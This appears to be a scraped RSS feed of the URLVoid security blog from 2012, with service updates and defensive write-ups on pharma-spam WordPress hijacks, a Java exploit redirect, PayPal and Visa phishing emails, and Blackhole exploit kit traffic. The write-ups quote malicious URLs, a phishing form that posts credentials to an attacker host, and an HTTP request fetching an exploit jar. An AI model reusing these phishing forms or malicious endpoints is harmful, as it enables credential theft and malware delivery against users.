- Optimized the report page (example)
- Show MyWOT reputation
- Show connection details, such as HTTP response code, connect time, etc
- Capture external URL redirections (screenshot, report)
- Show server geolocation map
- Show more geo information about an IP address
- Show detailed traffic graphs
- Show website recent activity on Facebook
- Optimized scanning of a website (faster)
- Added Swinog URIBL and VirusTracker as new scanning engines

Visit URLVoid.com →

The post Revamped URLVoid Website appeared first on URLVoid Blog.

We checked approximately 30 spammed URLs and we noted that the meta tag “generator” used by these hidden WordPress installations is almost always the same:

<meta name="generator" content="WordPress 3.6-alpha-*">

Interesting is that the main website shows a different meta generator:

Main website:
hxxp://www. ropaycomplementos .org/
<meta name="generator" content="WordPress 2.5" />
 
Hijacked URL:
hxxp://www. ropaycomplementos .org/wp-content/uploads/2008/09/?ptbl=4120-PureHands-pure-hands-discount-z
<meta name="generator" content="WordPress 3.6-alpha-23400">

And in some cases the main website does not have WordPress installed:

Main website:
hxxp://www. parenting101 .net/
Not WordPress
 
Hijacked URL:
hxxp://www. parenting101 .net/img/folen/?ptbl=10030-Flexeril-flexeril-in-canada
<meta name="generator" content="WordPress 3.6-alpha-23451">

Searching for a specific keyword is possible to find almost all compromised URLs:

The post WordPress installed in compromised websites to promote pharmaceutical keywords appeared first on URLVoid Blog.

We have analyzed the website (infected):

www (dot) wordpress-how-to-videos (dot) com

The website wordpress-how-to-videos(dot)com is hosted at BSE Software GmbH and its current IP address is 82.220.34.22 (330.hostserv.eu). The server machine is located in Switzerland (CH) and in the same server there are hosted other 0 websites. The domain is registered with the suffix COM and the keyword of the domain is wordpress-how-to-videos. The organization is hosttech GmbH.

The above website is used to redirect users to a malicious URL that tries to exploit the user’s browser with a Java exploit, as you can see from this image:

The malicious redirect is activated only if the user browse the malicious website with a referer that contains the string of search engines, such as Google. Using the free service HTML Sniffer we can simulate the Google referer and we can see that we are redirected to the exploit URL:

The exploit URL seems to be updated very frequently:

garliccommercial .ru /pavilion?8
midwaydance .ru /pavilion?8

Both malicious URLs are hosted in this IP address:

206.53.52 .13

The Java exploit is loaded from another malicious URL:

ypcbpukqt. lflinkup .com /PJeHubmUDaovPDRCJxGMEzlYXdvvppcg

Pay attention when clicking on websites of your Twitter followers!

The post WordPress-how-to-videos(dot)com Spreads Java Exploits appeared first on URLVoid Blog.

An example of XML output is this:

<?xml version="1.0" encoding="UTF-8"?>
<detected>
	<details domain="google.com" last_scan="1344104440" detected="0" lists_detected="" />
	<details domain="xxxtoolbar.com" last_scan="1344524302" detected="10" lists_detected="MyWOT,SCUMWARE,MalwareBlacklist,hpHosts,BrowserDefender,Malware Patrol ,DNS-BH,GoogleSafeBrowsing,SURBL,WebSecurityGuard" />
	<details domain="ysweb.com" last_scan="1343484791" detected="0" lists_detected="" />
</detected>

As you can see, you receive useful info:

domain="xxxtoolbar.com"

The name of the domain submitted.

last_scan="1344524302"

The date of the last available report.

detected="10"

The number of blacklist engines that have detected the domain.

lists_detected="MyWOT,SCUMWARE,MalwareBlacklist,hpHosts,BrowserDefender,Malware Patrol ,DNS-BH,GoogleSafeBrowsing,SURBL,WebSecurityGuard"

The name of each blacklist engines that have detected the domain.

How can I obtain an API key ?

The service needs a special key to being used and you can request your own API key by contacting us at info (at) novirusthanks (dot) org with the subject Request for URLVoid API Key, please include the following details:

1) Your Name
2) Your Email
3) Your Company
4) Your Website URL
5) Small description on how you are going to use URLVoid API

All your details will not be shared in any way and will be strictly private and used only to assign the API key to your email, nickname and website. After we have received your email, we will send in few days your API key to your email. Please note that you need to respect the following terms to use correctly our free API:

1) Not include/use the API in commercial products or services
2) Not use the API as substitute for Security products
3) Not use the API in unethical services
4) Include a backlink to our website (urlvoid.com)
5) Not abuse the service usage
6) Not use the API in services where you have no control

Non-compliance with these rules will result in the termination of your account/API key without prior notification and you will not be able to use the service.

For any other questions just send us an email. We recommend to follow our blog or our Twitter account to stay always updated with news and changes about this service.

The post URLVoid API v2.0 appeared first on URLVoid Blog.

Header details:

Received: from mail14j.g14.rapidsite.net (mail14j.g14.rapidsite.net [128.121.64.175])
Received: from ca1-mx26.mlpsca01.us.mxservers.net (128.121.64.172) by mail14j.g14.rapidsite.net
Received: from unknown [128.121.143.147] (EHLO mmm1430.rapidsite.net) by ca1-mx26.mlpsca01.us.mxservers.net (mxl_mta-3.1.0-05)
Received: from unknown (HELO mikesmirnoff-%cf%ca.local) (marketing@77.50.19.97)
Subject: Account Review Department
Date: Wed, 13 Jun 2012 12:27:42 +0400
X-SOURCE-IP: [128.121.143.147]
To:undisclosed-recipients:;
Content-Disposition: attachment; filename="Account.zip"

Attached there is a ZIP file named:

File: Account.zip
Size: 6694 bytes
MD5: 6AC253515AB76EE76D1E034AEC75FCD7
SHA1: 485E0A670CFE47F247C0BF6073D089A305BB6BEB
SHA256: 6EE32A16EC8711A741B7E9E74D2289ED91F078D5A91425B7F8BAC74D74BAD9BA
SHA384: A39150F4A3ADBFF90E53D0C9A2DCF36023DB1F7DB9D84AA5B6C54433502A544658F2E323B4064B7451D73058E12D4DFB
SHA512: BFE5443A418DBDF4B051AA7FD92F299A51A8972221B73D8B708AF7174E29F9132F3D3B645E8A7F33616CAC5EE1CCF2DBDE89D7D57B29C69AE47F1B8B979BBD6B

The extracted file is a .HTML file:

File: Account Verification.html
Size: 32224 bytes
MD5: FAF8A01884CC8E3941684659E015E8EB
SHA1: 9B24726C5B982DB8FE7E88E356B6CCDF74187344
SHA256: A5094D44CA1DFCEA0ED5D17DAD9385B2FCF043AB9C52E0C6FC061E38FFEC2E2D
SHA384: 3B64DE5DCED0F7F255298C20852216F4C681E9BD2C8A9B571058528775F45DFA9D1116F3462F50B0F170DD1EA246F4D4
SHA512: 6D07323C6E4AEEEF56F75178F3EC8CDECCACBBAD16F2AC66B173CAD90E2AC6CDEC6501338563E8719398836162E208BDB129A554F10C4E6B9C9890C53F1E652E

The sensitive data filled by the user is sent to this malicious URL:

hxxp:// akamai2.spteiqnaskqliliasnqxikcmenmn .ru /~jeremy/ze.php

Whois Details:

domain:        SPTEIQNASKQLILIASNQXIKCMENMN.RU
nserver:       ns1.nameself.com.
nserver:       ns2.nameself.com.
state:         REGISTERED, DELEGATED, UNVERIFIED
person:        Private Person
registrar:     REGTIME-REG-RIPN
admin-contact: http://whois.webnames.ru
created:       2011.08.17
paid-till:     2012.08.17
free-date:     2012.09.17
source:        TCI

URLVoid report:

http://www.urlvoid.com/scan/spteiqnaskqliliasnqxikcmenmn .ru

The post Phishing: PayPal Account Review Department appeared first on URLVoid Blog.

Amazon.com Order Confirmation

Inside the email message there is a HREF link that redirects users to a malicious web page containing malicious javascript code used to redirect users to the main URL of Blackhole exploit kit:

The Blackhole exploit kit URL is:

GET /main.php?page=017f3bb5c2be6a41 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: adnroidsoft .net

Fortunately the domain is not anymore active.

The post Amazon.com Order Confirmation leads to Blackhole Exploit Kit appeared first on URLVoid Blog.

As we can see from the image above, the injected code starts with:

<!--Injection_head[SessionID=...]-->

And it ends with:

<!--Injection_tail[SessionID=...]-->

Here is the report of the website infected with the malicious script:

http://www.scanurls.com/report/1614

The post New Malicious Injected Code: Injection_head and Injection_tail appeared first on URLVoid Blog.

The Java exploit file Set.jar is downloaded:

GET /Set.jar HTTP/1.1

content-type: application/x-java-archive

User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_13

Host: 64.111.24.122

HTTP/1.1 200 OK

Server: nginx

Date: Wed, 06 Jun 2012 22:43:12 GMT

Content-Type: application/java-archive

Content-Length: 20868

Accept-Ranges: bytes
PK........-
The post Recent Blackhole Exploit Kit Activity appeared first on URLVoid Blog.
]]>
			http://blog.urlvoid.com/recent-blackhole-exploit-kit-activity/feed/
		0
		
		
		
		http://blog.urlvoid.com/phishing-attention-votre-compte-paypal-a-ete-limite/
		http://blog.urlvoid.com/phishing-attention-votre-compte-paypal-a-ete-limite/#comments
		Mon, 04 Jun 2012 11:42:49 +0000
		admin
				
		
		
		

		http://blog.urlvoid.com/?p=1089
		New phishing email used to spread HTML files with fake PayPal login forms: Header details: Received: from ns3.komvos.gr (ns3.komvos.gr [88.198.65.153]) Received: by ns3.komvos.gr (Postfix, from userid 48) Subject: Attention ! Votre compte PayPal a été limité ! From: Service Paypal Date: Mon, 4 Jun 2012 13:00:12 +0300 (EEST) Content-Disposition: attachment; filename="Informations Compte Paypal .zip" There [...]
The post Phishing: Attention ! Votre compte PayPal a ete limite appeared first on URLVoid Blog.
]]>
				New phishing email used to spread HTML files with fake PayPal login forms:


Header details:

Received: from ns3.komvos.gr (ns3.komvos.gr [88.198.65.153])
Received: by ns3.komvos.gr (Postfix, from userid 48)
Subject: Attention ! Votre compte PayPal a été limité !
From: Service Paypal
Date: Mon,  4 Jun 2012 13:00:12 +0300 (EEST)
Content-Disposition: attachment; filename="Informations Compte Paypal .zip"

There is a ZIP file attached:

File: Informations Compte Paypal .zip
Dimensione: 5391 bytes
MD5: 2C573252C917A4E4FFC2138E48B50F2B
SHA1: 28B36A51D9215F143AC449984A27A74D520679B7
SHA256: 5E45F7E1988AE2F1B8721226D88AB7DD9EB8A395FB4C501E145554F49655C8C9
SHA384: EE4D4201B65716A986162D43F289FA695263B9BC3EB839F08F185F2B1A1DEC777C68439D91C068DAA80768712B53D80E
SHA512: BA111FCB751F40837E58F50F76314380E8D52FD97B5E98F7855D813433C8FFCDDD26AF58DEE7894F4BC4D2AF53760268FBE25C650FCDC55B0796F6D316E5147A

The extracted file is a .HTML file:

File: Informations Compte Paypal .html
Dimensione: 22525 bytes
MD5: 0500506DEDA37FBC1A7CD19C22173764
SHA1: AB7F78D2A70460418E858E4783F5D3F5376CF2E2
SHA256: F81D8AAA2996D7FB13320FD6F05C37AA1A1CD7BA7BCD29823B03731ED3A067E2
SHA384: 7EEA087DEEEE72203E81F7F606CDAD90F4F5EB1233A95DC692556AFE6AA5B94426E7B84881101F21BF84730B0E132EE3
SHA512: 0B858A75C10EBDBFC9A6D7CDE4C1AB34199B67A51999AB59E85086182C93EF66C20956BA62E68647C27B91704D5A2D4E2EA68749C77ED39DF4AB1F679245BE18

From this HTML code:

<form action="hxxp:// byrongoldworks .com /mainbody.php" method="post" name="zaz" onsubmit="return verif_formulaire()">

We can see that the sensitive data of the form is sent to:

hxxp:// byrongoldworks .com /mainbody.php

Report from URLVoid:

The post Phishing: Attention ! Votre compte PayPal a ete limite appeared first on URLVoid Blog.
]]>
			http://blog.urlvoid.com/phishing-attention-votre-compte-paypal-a-ete-limite/feed/
		0
		
		
		
		http://blog.urlvoid.com/phishing-abbiamo-limitato-laccesso-visamastercard-account-case-pp-001-546-712-069-orm001/
		http://blog.urlvoid.com/phishing-abbiamo-limitato-laccesso-visamastercard-account-case-pp-001-546-712-069-orm001/#comments
		Fri, 25 May 2012 15:59:51 +0000
		admin
				
		
		
		

		http://blog.urlvoid.com/?p=1083
		Another phishing email against Italian users of Mastercard / Visa: Header details: Received: from mail.oceano.hn (mail.oceano.hn [63.161.65.43]) Received: from User ([62.215.140.237]) by oceano.hn with MailEnable ESMTP; Fri, 25 May 2012 08:04:39 -0600 Subject: Abbiamo limitato l'accesso visa/mastercard account. Si prega di attenersi alla seguente procedura per risolvere. (Case # PP-001-546-712-069 - ORM001) Date: Fri, 25 [...]
The post Phishing: Abbiamo limitato l’accesso visa/mastercard account. appeared first on URLVoid Blog.
]]>
				Another phishing email against Italian users of Mastercard / Visa:


Header details:

Received: from mail.oceano.hn (mail.oceano.hn [63.161.65.43])
Received: from User ([62.215.140.237]) by oceano.hn with MailEnable ESMTP; Fri, 25 May 2012 08:04:39 -0600
Subject: Abbiamo limitato l'accesso visa/mastercard account. Si prega di attenersi alla seguente procedura per risolvere. (Case # PP-001-546-712-069 - ORM001)
Date: Fri, 25 May 2012 17:04:41 +0300
To: undisclosed-recipients:;
Content-Type: application/octet-stream; name="visaita.html"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="visaita.html"

There is a .HTML file attached:

File: visaita.html
Size: 25970 bytes
MD5: C6D16F0B6693AB2831E2BA70534C85BE
SHA1: AB4175E9B97A6E822E3D616BD4DDD5285AC70B39
SHA256: 7B8417D0A420DB5710B44252CF5B4813295EE1B8A51552BD6D5B847AC4AD9E85
SHA384: 4DB62497B232418E708AD8C5278BCDD48DD2E593CAAC01FC0963749EFA3B300BF116A539C222FB389020F61C2A516959
SHA512: 691B828A1FC25EE938114ECA74FFF5690AFE3F8F79AF4D13BB438C064663276CE97D5BED0BDDA3143A9D682FDF67E55C9F46CB1DAE69D5747297C9BF32B491F7

The post Phishing: Abbiamo limitato l’accesso visa/mastercard account. appeared first on URLVoid Blog.
]]>
			http://blog.urlvoid.com/phishing-abbiamo-limitato-laccesso-visamastercard-account-case-pp-001-546-712-069-orm001/feed/
		0